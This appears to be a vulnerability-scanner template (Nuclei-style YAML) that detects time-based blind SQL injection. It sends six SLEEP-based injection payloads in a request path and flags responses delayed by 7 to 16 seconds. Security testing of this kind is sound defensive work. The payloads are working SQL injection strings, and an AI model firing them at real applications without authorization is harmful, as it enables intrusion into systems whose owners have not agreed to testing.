id: {{.Name}}

info:
  name: Time-Based Blind SQL Injection
  author: wahyuhadi
  severity: critical
  description: |
    This Template detects time-based Blind SQL Injection vulnerability
  metadata:
    max-request: 3
  tags: time-based-sqli,sqli,dast,blind

flow: http(1) && http(2)

requests:
  - raw:
      - |
        {{ .Raw }}

    payloads:
      path:
        - "(SELECT(0)FROM(SELECT(SLEEP(7)))a)"
        - "'XOR(SELECT(0)FROM(SELECT(SLEEP(7)))a)XOR'Z"
        - "' AND (SELECT 4800 FROM (SELECT(SLEEP(7)))HoBG)--"
        - "if(now()=sysdate(),SLEEP(7),0)"
        - "'XOR(if(now()=sysdate(),SLEEP(7),0))XOR'Z"
        - "'XOR(SELECT CASE WHEN(1234=1234) THEN SLEEP(7) ELSE 0 END)XOR'Z"

    stop-at-first-match: true
    matchers:
      - type: dsl
        dsl:
          - "duration>=7 && duration <=16"
# digest: 4a0a0047304502202529d892c477e15738b4e5537c797e61478cb79afff398f2dc90fca1769751960221009f10ae4d72053768a125dfa0aa2497b24e5150a453c8536c0cea34d4e5d4a5ae:922c64590222798bb761d5b6d8e72950